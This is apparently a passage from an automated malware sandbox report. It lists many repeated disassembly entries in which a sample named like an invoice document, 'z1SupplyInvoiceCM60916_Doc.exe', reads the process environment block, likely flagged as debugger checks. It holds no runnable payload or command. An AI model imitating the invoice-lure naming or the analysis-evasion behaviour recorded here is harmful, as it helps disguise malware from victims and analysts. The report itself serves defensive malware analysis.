            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01794144 mov ecx, dword ptr fs:[00000030h]11_2_01794144
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01794144 mov eax, dword ptr fs:[00000030h]11_2_01794144
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01794144 mov eax, dword ptr fs:[00000030h]11_2_01794144
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01730124 mov eax, dword ptr fs:[00000030h]11_2_01730124
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017AA118 mov ecx, dword ptr fs:[00000030h]11_2_017AA118
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017AA118 mov eax, dword ptr fs:[00000030h]11_2_017AA118
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017AA118 mov eax, dword ptr fs:[00000030h]11_2_017AA118
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017AA118 mov eax, dword ptr fs:[00000030h]11_2_017AA118
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017C0115 mov eax, dword ptr fs:[00000030h]11_2_017C0115
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017AE10E mov eax, dword ptr fs:[00000030h]11_2_017AE10E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017AE10E mov ecx, dword ptr fs:[00000030h]11_2_017AE10E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017AE10E mov eax, dword ptr fs:[00000030h]11_2_017AE10E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017AE10E mov eax, dword ptr fs:[00000030h]11_2_017AE10E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017AE10E mov ecx, dword ptr fs:[00000030h]11_2_017AE10E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017AE10E mov eax, dword ptr fs:[00000030h]11_2_017AE10E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017AE10E mov eax, dword ptr fs:[00000030h]11_2_017AE10E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017AE10E mov ecx, dword ptr fs:[00000030h]11_2_017AE10E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017AE10E mov eax, dword ptr fs:[00000030h]11_2_017AE10E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017AE10E mov ecx, dword ptr fs:[00000030h]11_2_017AE10E
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017301F8 mov eax, dword ptr fs:[00000030h]11_2_017301F8
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D61E5 mov eax, dword ptr fs:[00000030h]11_2_017D61E5
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0177E1D0 mov eax, dword ptr fs:[00000030h]11_2_0177E1D0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0177E1D0 mov eax, dword ptr fs:[00000030h]11_2_0177E1D0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0177E1D0 mov ecx, dword ptr fs:[00000030h]11_2_0177E1D0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0177E1D0 mov eax, dword ptr fs:[00000030h]11_2_0177E1D0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0177E1D0 mov eax, dword ptr fs:[00000030h]11_2_0177E1D0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017C61C3 mov eax, dword ptr fs:[00000030h]11_2_017C61C3
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017C61C3 mov eax, dword ptr fs:[00000030h]11_2_017C61C3
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0178019F mov eax, dword ptr fs:[00000030h]11_2_0178019F
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0178019F mov eax, dword ptr fs:[00000030h]11_2_0178019F
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0178019F mov eax, dword ptr fs:[00000030h]11_2_0178019F
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0178019F mov eax, dword ptr fs:[00000030h]11_2_0178019F
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01740185 mov eax, dword ptr fs:[00000030h]11_2_01740185
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017BC188 mov eax, dword ptr fs:[00000030h]11_2_017BC188
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017BC188 mov eax, dword ptr fs:[00000030h]11_2_017BC188
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016FA197 mov eax, dword ptr fs:[00000030h]11_2_016FA197
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016FA197 mov eax, dword ptr fs:[00000030h]11_2_016FA197
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016FA197 mov eax, dword ptr fs:[00000030h]11_2_016FA197
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017A4180 mov eax, dword ptr fs:[00000030h]11_2_017A4180
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017A4180 mov eax, dword ptr fs:[00000030h]11_2_017A4180
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172C073 mov eax, dword ptr fs:[00000030h]11_2_0172C073
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01702050 mov eax, dword ptr fs:[00000030h]11_2_01702050
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01786050 mov eax, dword ptr fs:[00000030h]11_2_01786050
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01796030 mov eax, dword ptr fs:[00000030h]11_2_01796030
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016FA020 mov eax, dword ptr fs:[00000030h]11_2_016FA020
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016FC020 mov eax, dword ptr fs:[00000030h]11_2_016FC020
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0171E016 mov eax, dword ptr fs:[00000030h]11_2_0171E016
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0171E016 mov eax, dword ptr fs:[00000030h]11_2_0171E016
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0171E016 mov eax, dword ptr fs:[00000030h]11_2_0171E016
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0171E016 mov eax, dword ptr fs:[00000030h]11_2_0171E016
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01784000 mov ecx, dword ptr fs:[00000030h]11_2_01784000
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017A2000 mov eax, dword ptr fs:[00000030h]11_2_017A2000
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017A2000 mov eax, dword ptr fs:[00000030h]11_2_017A2000
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017A2000 mov eax, dword ptr fs:[00000030h]11_2_017A2000
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017A2000 mov eax, dword ptr fs:[00000030h]11_2_017A2000
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017A2000 mov eax, dword ptr fs:[00000030h]11_2_017A2000
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017A2000 mov eax, dword ptr fs:[00000030h]11_2_017A2000
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017A2000 mov eax, dword ptr fs:[00000030h]11_2_017A2000
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017A2000 mov eax, dword ptr fs:[00000030h]11_2_017A2000
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017420F0 mov ecx, dword ptr fs:[00000030h]11_2_017420F0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016FA0E3 mov ecx, dword ptr fs:[00000030h]11_2_016FA0E3
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017860E0 mov eax, dword ptr fs:[00000030h]11_2_017860E0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017080E9 mov eax, dword ptr fs:[00000030h]11_2_017080E9
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016FC0F0 mov eax, dword ptr fs:[00000030h]11_2_016FC0F0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017820DE mov eax, dword ptr fs:[00000030h]11_2_017820DE
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017C60B8 mov eax, dword ptr fs:[00000030h]11_2_017C60B8
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017C60B8 mov ecx, dword ptr fs:[00000030h]11_2_017C60B8
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016F80A0 mov eax, dword ptr fs:[00000030h]11_2_016F80A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017980A8 mov eax, dword ptr fs:[00000030h]11_2_017980A8
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170208A mov eax, dword ptr fs:[00000030h]11_2_0170208A
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017A437C mov eax, dword ptr fs:[00000030h]11_2_017A437C
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0178035C mov eax, dword ptr fs:[00000030h]11_2_0178035C
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0178035C mov eax, dword ptr fs:[00000030h]11_2_0178035C
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0178035C mov eax, dword ptr fs:[00000030h]11_2_0178035C
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0178035C mov ecx, dword ptr fs:[00000030h]11_2_0178035C
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0178035C mov eax, dword ptr fs:[00000030h]11_2_0178035C
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0178035C mov eax, dword ptr fs:[00000030h]11_2_0178035C
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017A8350 mov ecx, dword ptr fs:[00000030h]11_2_017A8350
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017CA352 mov eax, dword ptr fs:[00000030h]11_2_017CA352
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01782349 mov eax, dword ptr fs:[00000030h]11_2_01782349
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01782349 mov eax, dword ptr fs:[00000030h]11_2_01782349
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01782349 mov eax, dword ptr fs:[00000030h]11_2_01782349
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01782349 mov eax, dword ptr fs:[00000030h]11_2_01782349
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01782349 mov eax, dword ptr fs:[00000030h]11_2_01782349
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01782349 mov eax, dword ptr fs:[00000030h]11_2_01782349
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01782349 mov eax, dword ptr fs:[00000030h]11_2_01782349
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01782349 mov eax, dword ptr fs:[00000030h]11_2_01782349
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01782349 mov eax, dword ptr fs:[00000030h]11_2_01782349
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01782349 mov eax, dword ptr fs:[00000030h]11_2_01782349
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01782349 mov eax, dword ptr fs:[00000030h]11_2_01782349
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01782349 mov eax, dword ptr fs:[00000030h]11_2_01782349
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01782349 mov eax, dword ptr fs:[00000030h]11_2_01782349
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01782349 mov eax, dword ptr fs:[00000030h]11_2_01782349
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01782349 mov eax, dword ptr fs:[00000030h]11_2_01782349
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D634F mov eax, dword ptr fs:[00000030h]11_2_017D634F
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D8324 mov eax, dword ptr fs:[00000030h]11_2_017D8324
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D8324 mov ecx, dword ptr fs:[00000030h]11_2_017D8324
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D8324 mov eax, dword ptr fs:[00000030h]11_2_017D8324
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D8324 mov eax, dword ptr fs:[00000030h]11_2_017D8324
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01720310 mov ecx, dword ptr fs:[00000030h]11_2_01720310
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173A30B mov eax, dword ptr fs:[00000030h]11_2_0173A30B
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173A30B mov eax, dword ptr fs:[00000030h]11_2_0173A30B
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173A30B mov eax, dword ptr fs:[00000030h]11_2_0173A30B
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016FC310 mov ecx, dword ptr fs:[00000030h]11_2_016FC310
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0171E3F0 mov eax, dword ptr fs:[00000030h]11_2_0171E3F0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0171E3F0 mov eax, dword ptr fs:[00000030h]11_2_0171E3F0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0171E3F0 mov eax, dword ptr fs:[00000030h]11_2_0171E3F0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017363FF mov eax, dword ptr fs:[00000030h]11_2_017363FF
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017103E9 mov eax, dword ptr fs:[00000030h]11_2_017103E9
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017103E9 mov eax, dword ptr fs:[00000030h]11_2_017103E9
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017103E9 mov eax, dword ptr fs:[00000030h]11_2_017103E9
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017103E9 mov eax, dword ptr fs:[00000030h]11_2_017103E9
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017103E9 mov eax, dword ptr fs:[00000030h]11_2_017103E9
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017103E9 mov eax, dword ptr fs:[00000030h]11_2_017103E9
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017103E9 mov eax, dword ptr fs:[00000030h]11_2_017103E9
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017103E9 mov eax, dword ptr fs:[00000030h]11_2_017103E9
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017AE3DB mov eax, dword ptr fs:[00000030h]11_2_017AE3DB
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017AE3DB mov eax, dword ptr fs:[00000030h]11_2_017AE3DB
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017AE3DB mov ecx, dword ptr fs:[00000030h]11_2_017AE3DB
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017AE3DB mov eax, dword ptr fs:[00000030h]11_2_017AE3DB
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017A43D4 mov eax, dword ptr fs:[00000030h]11_2_017A43D4
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017A43D4 mov eax, dword ptr fs:[00000030h]11_2_017A43D4
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170A3C0 mov eax, dword ptr fs:[00000030h]11_2_0170A3C0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170A3C0 mov eax, dword ptr fs:[00000030h]11_2_0170A3C0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170A3C0 mov eax, dword ptr fs:[00000030h]11_2_0170A3C0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170A3C0 mov eax, dword ptr fs:[00000030h]11_2_0170A3C0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170A3C0 mov eax, dword ptr fs:[00000030h]11_2_0170A3C0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170A3C0 mov eax, dword ptr fs:[00000030h]11_2_0170A3C0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017083C0 mov eax, dword ptr fs:[00000030h]11_2_017083C0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017083C0 mov eax, dword ptr fs:[00000030h]11_2_017083C0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017083C0 mov eax, dword ptr fs:[00000030h]11_2_017083C0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017083C0 mov eax, dword ptr fs:[00000030h]11_2_017083C0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017BC3CD mov eax, dword ptr fs:[00000030h]11_2_017BC3CD
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017863C0 mov eax, dword ptr fs:[00000030h]11_2_017863C0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016FE388 mov eax, dword ptr fs:[00000030h]11_2_016FE388
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016FE388 mov eax, dword ptr fs:[00000030h]11_2_016FE388
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016FE388 mov eax, dword ptr fs:[00000030h]11_2_016FE388
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016F8397 mov eax, dword ptr fs:[00000030h]11_2_016F8397
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016F8397 mov eax, dword ptr fs:[00000030h]11_2_016F8397
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016F8397 mov eax, dword ptr fs:[00000030h]11_2_016F8397
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172438F mov eax, dword ptr fs:[00000030h]11_2_0172438F
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0172438F mov eax, dword ptr fs:[00000030h]11_2_0172438F
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016F826B mov eax, dword ptr fs:[00000030h]11_2_016F826B
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B0274 mov eax, dword ptr fs:[00000030h]11_2_017B0274
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B0274 mov eax, dword ptr fs:[00000030h]11_2_017B0274
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B0274 mov eax, dword ptr fs:[00000030h]11_2_017B0274
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B0274 mov eax, dword ptr fs:[00000030h]11_2_017B0274
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B0274 mov eax, dword ptr fs:[00000030h]11_2_017B0274
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B0274 mov eax, dword ptr fs:[00000030h]11_2_017B0274
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B0274 mov eax, dword ptr fs:[00000030h]11_2_017B0274
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B0274 mov eax, dword ptr fs:[00000030h]11_2_017B0274
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B0274 mov eax, dword ptr fs:[00000030h]11_2_017B0274
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B0274 mov eax, dword ptr fs:[00000030h]11_2_017B0274
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B0274 mov eax, dword ptr fs:[00000030h]11_2_017B0274
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017B0274 mov eax, dword ptr fs:[00000030h]11_2_017B0274
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01704260 mov eax, dword ptr fs:[00000030h]11_2_01704260
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01704260 mov eax, dword ptr fs:[00000030h]11_2_01704260
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01704260 mov eax, dword ptr fs:[00000030h]11_2_01704260
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D625D mov eax, dword ptr fs:[00000030h]11_2_017D625D
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01706259 mov eax, dword ptr fs:[00000030h]11_2_01706259
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017BA250 mov eax, dword ptr fs:[00000030h]11_2_017BA250
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017BA250 mov eax, dword ptr fs:[00000030h]11_2_017BA250
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01788243 mov eax, dword ptr fs:[00000030h]11_2_01788243
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01788243 mov ecx, dword ptr fs:[00000030h]11_2_01788243
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016FA250 mov eax, dword ptr fs:[00000030h]11_2_016FA250
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_016F823B mov eax, dword ptr fs:[00000030h]11_2_016F823B
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017102E1 mov eax, dword ptr fs:[00000030h]11_2_017102E1
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017102E1 mov eax, dword ptr fs:[00000030h]11_2_017102E1
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017102E1 mov eax, dword ptr fs:[00000030h]11_2_017102E1
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017D62D6 mov eax, dword ptr fs:[00000030h]11_2_017D62D6
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170A2C3 mov eax, dword ptr fs:[00000030h]11_2_0170A2C3
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170A2C3 mov eax, dword ptr fs:[00000030h]11_2_0170A2C3
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170A2C3 mov eax, dword ptr fs:[00000030h]11_2_0170A2C3
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170A2C3 mov eax, dword ptr fs:[00000030h]11_2_0170A2C3
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0170A2C3 mov eax, dword ptr fs:[00000030h]11_2_0170A2C3
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017962A0 mov eax, dword ptr fs:[00000030h]11_2_017962A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017962A0 mov ecx, dword ptr fs:[00000030h]11_2_017962A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017962A0 mov eax, dword ptr fs:[00000030h]11_2_017962A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017962A0 mov eax, dword ptr fs:[00000030h]11_2_017962A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017962A0 mov eax, dword ptr fs:[00000030h]11_2_017962A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_017962A0 mov eax, dword ptr fs:[00000030h]11_2_017962A0
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173E284 mov eax, dword ptr fs:[00000030h]11_2_0173E284
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_0173E284 mov eax, dword ptr fs:[00000030h]11_2_0173E284
            Source: C:\Users\user\Desktop\z1SupplyInvoiceCM60916_Doc.exeCode function: 11_2_01780283 mov eax, dword ptr fs:[00000030h]11_2_01780283
